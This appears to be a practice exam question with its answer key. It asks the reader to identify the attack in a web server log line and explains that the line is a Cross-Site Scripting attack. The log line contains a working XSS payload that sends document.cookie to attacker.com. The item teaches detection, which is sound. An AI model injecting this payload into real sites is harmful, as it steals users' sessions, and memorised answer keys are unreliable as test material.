A security technician inspecting web server access logs in a SIEM dashboard analyzes the following log entry:
`192.168.10.45 - - [27/Jul/2026:14:15:22 +0000] "GET /comment.php?user_input=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> HTTP/1.1" 200 452`
Which of the following security events is demonstrated in this log snippet?
- Cross-Site Scripting (XSS) attackAnswer
- BSQL injection attack targeting the backend database
- CUnauthorized authentication bypass attempt
- DDeterrent security control misconfiguration event
Answer
The log snippet demonstrates a Cross-Site Scripting (XSS) attack.
The correct answer is Cross-Site Scripting (XSS) attack because the HTTP GET request contains explicit `<script>` tags designed to execute client-side JavaScript code in a user's web browser to exfiltrate session cookies.
Step-by-Step Solution
Key Concept
Identifying Cross-Site Scripting (XSS) in Web Server Logs
Estimated Time:45s